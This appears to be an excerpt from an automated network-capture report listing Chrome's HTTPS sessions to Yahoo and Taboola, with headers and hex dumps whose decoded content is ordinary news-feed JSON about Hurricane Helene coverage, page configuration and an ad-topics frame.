                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 65 6e 74 2d 62 79 6c 69 6e 65 2d 77 72 61 70 70 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 61 74 74 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 61 74 74 72 2d 6d 65 74 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 61 74 74 72 2d 69 74 65 6d 2d 61 75 74 68 6f 72 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 63 61 61 73 2d 61 75 74 68 6f 72 2d 62 79 6c 69 6e 65 2d 63 6f 6c 6c 61 70 73 65 3e 52 61 62 65 6b 61 68 20 48 65 6e 64 65 72 73 6f 6e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 61 61 73 2d 61 74 74 72 2d 74 69 6d 65 2d 73 74 79 6c 65 3e 3c 74 69 6d 65 20 63 6c 61 73 73 3d 63 61 61 73 2d 61 74 74 72 2d 6d 65 74 61 2d 74 69 6d 65 20 64 61 74 65 54 69 6d 65 3d 32 30 32 34 2d 30 39 2d 33 30 54 31 31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ent-byline-wrapper><div class=caas-attr><div class=caas-attr-meta><div class=caas-attr-item-author><span class=caas-author-byline-collapse>Rabekah Henderson</span></div><div class=caas-attr-time-style><time class=caas-attr-meta-time dateTime=2024-09-30T11


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    126192.168.2.44988787.248.119.2514434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1681OUTGET /caas/content/article/?uuid=2b2a262c-878f-3f65-9ba6-39ad37b780eb,b919e796-b03c-39fc-87e7-500abd2430fc,dce5eeb8-da4f-3016-b6b1-671a1b05f180,cc162679-b996-3b22-bf08-a33e637cd3e7,e83ce260-cc8d-4911-9251-00d71cd9beb8,877f8ab1-324b-3028-8015-3030372e4744,12f9c9af-c6c2-3c17-b79d-5f82604d80b2,9df6c4a7-8f43-3b8c-bc27-cbec371808d8,d6bedef8-7f7f-361b-a1ed-95df489e3d8b,17667347-cb18-3690-87e0-525837a669bf&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=900,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1pa4ckpjflnfm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC639INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-methods: GET, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-length: 409669
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    etag: W/"64045-Mr3WMC0LYD89CDCP+QxwRbkPhvM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:21:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 145
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC606INData Raw: 7b 22 69 74 65 6d 73 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 22 70 61 72 74 6e 65 72 44 61 74 61 22 3a 7b 22 61 64 4d 65 74 61 22 3a 7b 22 68 61 73 68 74 61 67 22 3a 22 6e 65 77 73 3b 64 69 73 61 73 74 65 72 73 3b 77 65 61 74 68 65 72 3b 6e 61 74 75 72 61 6c 70 68 65 6e 6f 6d 65 6e 61 3b 63 75 6c 74 75 72 65 3b 6e 61 74 75 72 65 61 6e 64 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 22 69 73 53 75 70 70 6c 79 53 65 67 6d 65 6e 74 22 3a 22 66 61 6c 73 65 22 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 55 53 22 2c 22 72 73 22 3a 22 6c 6d 73 69 64 3a 61 30 61 36 54 30 30 30 30 30 52 32 4b 58 47 51 41 33 3b 72 65 76 73 70 3a 63 6e 6e 5f 61 72 74 69 63 6c 65 73 5f 38 37 35 3b 6c 70 73 74 61 69 64 3a 32 62 32 61 32 36 32 63 2d 38 37 38 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"news;disasters;weather;naturalphenomena;culture;natureandenvironment","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a6T00000R2KXGQA3;revsp:cnn_articles_875;lpstaid:2b2a262c-878f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 67 61 74 65 3b 4b 61 6d 61 6c 61 5f 48 61 72 72 69 73 3b 54 65 6e 6e 65 73 73 65 65 3b 4d 69 63 68 65 6c 6c 65 5f 43 6f 6c 65 6d 61 6e 3b 4e 61 74 69 6f 6e 61 6c 5f 57 65 61 74 68 65 72 5f 53 65 72 76 69 63 65 5c 22 20 63 74 6f 70 69 64 3d 5c 22 31 38 38 35 37 34 38 39 3b 31 38 38 35 39 34 38 39 3b 31 39 38 35 30 30 30 3b 31 32 38 31 38 30 30 30 3b 31 39 39 36 30 30 30 5c 22 20 68 61 73 68 74 61 67 3d 5c 22 6e 65 77 73 3b 31 38 38 35 37 34 38 39 3b 31 38 38 35 39 34 38 39 3b 31 39 38 35 30 30 30 3b 31 32 38 31 38 30 30 30 3b 31 39 39 36 30 30 30 5c 22 20 72 73 3d 5c 22 6c 6d 73 69 64 3a 61 30 61 36 54 30 30 30 30 30 52 32 4b 58 47 51 41 33 3b 72 65 76 73 70 3a 63 6e 6e 5f 61 72 74 69 63 6c 65 73 5f 38 37 35 3b 6c 70 73 74 61 69 64 3a 32 62 32 61 32 36 32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: gate;Kamala_Harris;Tennessee;Michelle_Coleman;National_Weather_Service\" ctopid=\"18857489;18859489;1985000;12818000;1996000\" hashtag=\"news;18857489;18859489;1985000;12818000;1996000\" rs=\"lmsid:a0a6T00000R2KXGQA3;revsp:cnn_articles_875;lpstaid:2b2a262
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 72 6f 6c 69 6e 61 22 2c 22 6c 61 62 65 6c 22 3a 22 53 6f 75 74 68 20 43 61 72 6f 6c 69 6e 61 22 2c 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 39 31 34 22 2c 22 6d 65 74 61 44 61 74 61 22 3a 5b 7b 22 76 69 73 69 62 6c 65 22 3a 22 66 61 6c 73 65 22 7d 5d 2c 22 73 74 61 72 74 63 68 61 72 22 3a 31 36 35 38 2c 22 65 6e 64 63 68 61 72 22 3a 31 36 37 31 2c 22 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 57 49 4b 49 49 44 3a 4a 6f 65 5f 42 69 64 65 6e 22 2c 22 6c 61 62 65 6c 22 3a 22 50 72 65 73 69 64 65 6e 74 20 4a 6f 65 20 42 69 64 65 6e 22 2c 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 39 31 22 2c 22 6d 65 74 61 44 61 74 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: rolina","label":"South Carolina","capAbtScore":"0.914","metaData":[{"visible":"false"}],"startchar":1658,"endchar":1671,"specialParentTags":[],"instanceParentTags":[]},{"term":"WIKIID:Joe_Biden","label":"President Joe Biden","capAbtScore":"0.91","metaData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 68 33 22 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 22 2c 22 6c 61 62 65 6c 22 3a 22 48 65 6c 65 6e 65 22 2c 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 38 30 31 22 2c 22 6d 65 74 61 44 61 74 61 22 3a 5b 7b 22 76 69 73 69 62 6c 65 22 3a 22 66 61 6c 73 65 22 7d 5d 2c 22 73 74 61 72 74 63 68 61 72 22 3a 32 33 35 2c 22 65 6e 64 63 68 61 72 22 3a 32 34 30 2c 22 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 61 22 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 61 22 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 57 49 4b 49 49 44 3a 48 65 6e 64 65 72 73 6f 6e 5f 43 6f 75 6e 74 79 2c 5f 4e 6f 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: specialParentTags":["h3"],"instanceParentTags":[]},{"term":"","label":"Helene","capAbtScore":"0.801","metaData":[{"visible":"false"}],"startchar":235,"endchar":240,"specialParentTags":["a"],"instanceParentTags":["a"]},{"term":"WIKIID:Henderson_County,_Nor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 64 65 61 64 2d 35 30 30 2d 30 37 30 37 34 33 36 35 38 2e 68 74 6d 6c 22 2c 22 68 61 73 53 63 72 69 62 62 6c 65 22 3a 66 61 6c 73 65 2c 22 68 61 73 53 6c 69 63 6b 56 69 64 65 6f 22 3a 66 61 6c 73 65 2c 22 68 61 73 58 72 61 79 53 69 64 65 52 61 69 6c 22 3a 66 61 6c 73 65 2c 22 68 65 72 6f 4d 6f 64 75 6c 65 22 3a 7b 7d 2c 22 68 69 64 65 41 6c 6c 41 64 73 22 3a 66 61 6c 73 65 2c 22 68 6f 73 74 65 64 54 79 70 65 22 3a 22 68 6f 73 74 65 64 22 2c 22 68 72 65 66 4c 61 6e 67 73 22 3a 5b 5d 2c 22 69 73 41 66 66 69 6c 69 6d 61 74 65 54 65 73 74 22 3a 66 61 6c 73 65 2c 22 69 73 42 72 61 6e 64 65 64 43 6f 6e 74 65 6e 74 22 3a 66 61 6c 73 65 2c 22 69 73 43 6f 6d 6d 65 6e 74 73 45 6c 69 67 69 62 6c 65 22 3a 66 61 6c 73 65 2c 22 69 73 43 72 65 61 74 6f 72 43 6f 6e 74 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: dead-500-070743658.html","hasScribble":false,"hasSlickVideo":false,"hasXraySideRail":false,"heroModule":{},"hideAllAds":false,"hostedType":"hosted","hrefLangs":[],"isAffilimateTest":false,"isBrandedContent":false,"isCommentsEligible":false,"isCreatorConte
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 6e 6e 5f 61 72 74 69 63 6c 65 73 5f 38 37 35 22 5d 2c 22 70 72 6f 76 69 64 65 72 42 72 61 6e 64 22 3a 7b 22 69 64 22 3a 22 35 37 64 35 62 31 65 37 2d 30 38 65 30 2d 33 39 61 66 2d 39 36 33 61 2d 65 32 38 61 66 32 63 38 63 32 66 35 22 2c 22 62 72 61 6e 64 49 64 22 3a 22 63 6e 6e 22 2c 22 64 69 73 70 6c 61 79 4e 61 6d 65 22 3a 22 43 4e 4e 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 73 74 61 74 65 22 3a 22 22 2c 22 73 65 63 6f 6e 64 61 72 79 54 79 70 65 73 22 3a 5b 5d 2c 22 73 6f 63 69 61 6c 41 6c 69 61 73 65 73 22 3a 5b 5d 2c 22 63 61 6c 6c 54 6f 41 63 74 69 6f 6e 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 63 61 6c 6c 54 6f 41 63 74 69 6f 6e 73 22 3a 5b 5d 2c 22 62 72 61 6e 64 54 68 65 6d 65 22 3a 7b 7d 2c 22 73 61 6d 65 41 73 41 75 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: nn_articles_875"],"providerBrand":{"id":"57d5b1e7-08e0-39af-963a-e28af2c8c2f5","brandId":"cnn","displayName":"CNN","description":"","state":"","secondaryTypes":[],"socialAliases":[],"callToActionEnabled":false,"callToActions":[],"brandTheme":{},"sameAsAut
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 74 68 5f 43 61 72 6f 6c 69 6e 61 2c 53 6f 75 74 68 5f 43 61 72 6f 6c 69 6e 61 2c 4a 6f 65 5f 42 69 64 65 6e 2c 57 68 69 74 65 5f 48 6f 75 73 65 2c 48 75 72 72 69 63 61 6e 65 5f 48 65 6c 65 6e 65 5f 25 32 38 31 39 35 38 25 32 39 2c 41 73 68 65 76 69 6c 6c 65 2c 5f 4e 6f 72 74 68 5f 43 61 72 6f 6c 69 6e 61 2c 46 6c 6f 72 69 64 61 2c 49 6e 66 72 61 73 74 72 75 63 74 75 72 65 2c 48 65 6e 64 65 72 73 6f 6e 5f 43 6f 75 6e 74 79 2c 5f 4e 6f 72 74 68 5f 43 61 72 6f 6c 69 6e 61 2c 4d 6f 62 69 6c 65 5f 70 68 6f 6e 65 5f 73 69 67 6e 61 6c 2c 44 65 61 6e 6e 65 5f 43 72 69 73 77 65 6c 6c 2c 42 75 6e 63 6f 6d 62 65 5f 43 6f 75 6e 74 79 2c 5f 4e 6f 72 74 68 5f 43 61 72 6f 6c 69 6e 61 2c 44 6f 6e 61 6c 64 5f 54 72 75 6d 70 2c 43 72 61 69 67 5f 46 75 67 61 74 65 2c 4b 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: th_Carolina,South_Carolina,Joe_Biden,White_House,Hurricane_Helene_%281958%29,Asheville,_North_Carolina,Florida,Infrastructure,Henderson_County,_North_Carolina,Mobile_phone_signal,Deanne_Criswell,Buncombe_County,_North_Carolina,Donald_Trump,Craig_Fugate,Ka
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 4e 4c 49 4e 45 5f 43 4f 4e 53 45 4e 54 5f 42 4c 4f 43 4b 45 44 5f 33 50 5f 42 55 54 54 4f 4e 5f 41 4c 4c 4f 57 5c 22 3a 5c 22 41 6c 6c 6f 77 5c 22 2c 5c 22 4c 45 53 53 5c 22 3a 5c 22 4c 65 73 73 5c 22 2c 5c 22 4c 49 56 45 5f 49 53 5f 4f 56 45 52 5c 22 3a 5c 22 4c 49 56 45 20 43 4f 56 45 52 41 47 45 20 49 53 20 4f 56 45 52 5c 22 2c 5c 22 4c 4f 41 44 49 4e 47 5c 22 3a 5c 22 4c 6f 61 64 69 6e 67 5c 22 2c 5c 22 4d 4f 52 45 5c 22 3a 5c 22 4d 6f 72 65 5c 22 2c 5c 22 4e 45 57 5f 55 50 44 41 54 45 5c 22 3a 5c 22 6e 65 77 20 75 70 64 61 74 65 5c 22 2c 5c 22 4e 45 57 5f 55 50 44 41 54 45 53 5c 22 3a 5c 22 6e 65 77 20 75 70 64 61 74 65 73 5c 22 2c 5c 22 4a 55 53 54 5f 4e 4f 57 5c 22 3a 5c 22 4a 75 73 74 20 6e 6f 77 5c 22 2c 5c 22 52 45 4c 4f 41 44 5c 22 3a 5c 22 43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: NLINE_CONSENT_BLOCKED_3P_BUTTON_ALLOW\":\"Allow\",\"LESS\":\"Less\",\"LIVE_IS_OVER\":\"LIVE COVERAGE IS OVER\",\"LOADING\":\"Loading\",\"MORE\":\"More\",\"NEW_UPDATE\":\"new update\",\"NEW_UPDATES\":\"new updates\",\"JUST_NOW\":\"Just now\",\"RELOAD\":\"C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 64 73 53 6c 6f 74 73 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 52 52 41 64 73 53 6c 6f 74 73 57 69 74 68 4a 41 43 5c 22 3a 74 72 75 65 2c 5c 22 6e 65 77 73 4d 6f 64 61 6c 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 56 69 65 77 43 6f 6d 6d 65 6e 74 73 43 54 41 5c 22 3a 74 72 75 65 7d 2c 5c 22 63 6f 6e 66 69 67 5c 22 3a 7b 5c 22 61 75 74 68 6f 72 42 79 6c 69 6e 65 43 6f 6c 6c 61 70 73 65 4c 69 6e 65 43 6f 75 6e 74 5c 22 3a 32 2c 5c 22 63 6f 6d 6d 65 72 63 65 51 75 69 63 6b 4f 76 65 72 76 69 65 77 4c 69 6d 69 74 5c 22 3a 35 2c 5c 22 66 72 65 65 7a 65 4f 6e 4c 69 6e 6b 43 6c 69 63 6b 5c 22 3a 74 72 75 65 2c 5c 22 6c 61 7a 79 4f 66 66 73 65 74 59 5c 22 3a 31 33 30 30 2c 5c 22 6c 69 76 65 63 6f 76 65 72 61 67 65 5c 22 3a 7b 5c 22 64 65 66 65 72 5c 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: dsSlots\":true,\"enableRRAdsSlotsWithJAC\":true,\"newsModal\":true,\"enableViewCommentsCTA\":true},\"config\":{\"authorBylineCollapseLineCount\":2,\"commerceQuickOverviewLimit\":5,\"freezeOnLinkClick\":true,\"lazyOffsetY\":1300,\"livecoverage\":{\"defer\"


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    127192.168.2.449889151.101.1.444434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC724OUTGET /libtrc/static/topics/taboola-browsing-topics.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: cdn.taboola.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC765INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: XpdarbRYcQc1szgfZopNiCDiZgNmsLP4zikDwZoW4SMpZ+0RCDubYqytu0z6CRLdtCQQ5aSBz9nLEUVEXd0PuidjBQ6j36OS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: DDQ7TWPSBKRT2T0X
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 13 Feb 2024 13:15:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "8b140f0f0f6e1a0f986cc7d6dfd74d65"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: 4MpQ_aQntJKuJTBB3LGK3B7cfa8k5k0b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 13406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:21:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Served-By: cache-ewr-kewr1740024-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Timer: S1727716863.423550,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: private,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    abp: 11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC664INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 61 62 6f 6f 6c 61 20 54 6f 70 69 63 73 20 46 72 61 6d 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 28 61 73 79 6e 63 28 29 3d 3e 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 22 62 72 6f 77 73 69 6e 67 54 6f 70 69 63 73 22 69 6e 20 64 6f 63 75 6d 65 6e 74 26 26 64 6f 63 75 6d 65 6e 74 2e 66 65 61 74 75 72 65 50 6f 6c 69 63 79 2e 61 6c 6c 6f 77 73 46 65 61 74 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Taboola Topics Frame</title> <script> (async()=>{ var s=document.referrer; if("browsingTopics"in document&&document.featurePolicy.allowsFeatu


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    128192.168.2.44989387.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1042OUTPOST /fp_ms/_rcv/remote?ctrl=Shopping&m_id=react-wafer-shopping&m_mode=json&partner=none HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 297
